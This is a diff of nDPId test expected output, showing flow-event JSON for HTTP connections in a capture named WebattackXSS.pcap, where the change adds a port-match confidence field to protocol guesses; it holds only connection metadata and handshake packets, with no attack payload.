-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347968739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347970267,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347970267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vvZAAD4GBtqsEAABwKgKMocqAFAxLQXyAAAAAKACchDkKQAAAgQFtAQCCAoBPLsEAAAAAAEDAwc="}
@@ -3394,17 +3394,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347976658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z4xAAD4GXkSsEAABwKgKModuAFDMdKbNAAAAAKACchChhQAAAgQFtAQCCAoBPMFBAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":2,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347976658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh26qPdKAzHSmzqAScSCPCQAAAgQFtAQCCAoD5pK2ATzBQQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":3,"flow_last_seen":1499347976659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347976659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z41AAD4GXkusEAABwKgKModuAFDMdKbOqj3SgYAQAOUuEAAAAQEICgE8wUID5pK2"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347978978,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347979251,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347979251,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347979251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8naJAAD4GKC6sEAABwKgKMoeIAFCOM15oAAAAAKACchAliQAAAgQFtAQCCAoBPMPKAAAAAAEDAwc="}
@@ -3434,19 +3434,19 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347988233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aCNAAD4GXa2sEAABwKgKMofoAFBt56SsAAAAAKACchD2awAAAgQFtAQCCAoBPMyPAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":2,"flow_last_seen":1499347988233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347988233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh+gH+IEYbeekraAScSDMUAAAAgQFtAQCCAoD5p4DATzMjwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":3,"flow_last_seen":1499347988234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347988234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aCRAAD4GXbSsEAABwKgKMofoAFBt56StB\/iBGYAQAOVrWAAAAQEICgE8zI8D5p4D"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347989244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
